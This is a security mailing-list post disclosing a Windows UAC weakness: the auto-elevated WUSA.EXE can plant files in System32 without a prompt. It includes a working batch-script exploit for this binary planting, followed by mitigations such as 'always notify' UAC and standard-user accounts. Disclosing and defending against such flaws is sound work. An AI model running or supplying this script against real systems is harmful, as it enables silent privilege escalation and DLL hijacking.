Back to list
Defense in depth -- the Microsoft way (part 31): UAC is for binary planting
Mar 15 2015 03:48PM
Stefan Kanthak (stefan kanthak nexgo de)
the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.
In Microsoft's own terms it doesn't qualify as security
vulnerability since UAC is a security feature, not a
* a user running as "protected Administrator" on Windows 7
and newer with standard UAC settings.
JFTR: this is the default for "out-of-the-box" installations
and typically almost never changed!
* some executables in directory %SystemRoot%\, but not in
directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);
JFTR: REGEDIT.EXE is one of these executables, and it has a
manifest which specifies
so users running as "protected Administrator" are
accustomed to the UAC prompt when they start REGEDIT.EXE
and will most probably acknowledge the privilege elevation.
Exploit (to be run as a batch script):
for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
if exist "%SystemRoot%\System32\%~1" goto :EOF
copy NUL: "%TEMP%\%~1"
"%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
"%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
if /I "%~x1" == ".exe" "%~1" /?
WUSA.EXE is one of the about 70 Microsoft programs which are
UAC-autoelevated since Windows 7, so the user doesn't need to
answer the UAC prompt when the batch script plants a file in
the directory "%SystemRoot%\System32\"
* set the UAC control to "ask always" (as it was in Windows Vista)
* remove the user accounts created during setup from the
"Administrators" group and place them in the "Users" group, i.e.
demote these accounts from "Administrator" to "Standard user".
Start->Run "control.exe userpasswords2" alias
"rundll32.exe netplwiz.dll,UsersRunDll" allows this operation!
JFTR: don't forget to enable the builtin "Administrator" account.
| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
| should be used sparingly. You probably created this type of
| account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
| accounts for other people on your PC, it's a good idea to give
| them standard accounts.
[ reply ]
Copyright 2010, SecurityFocus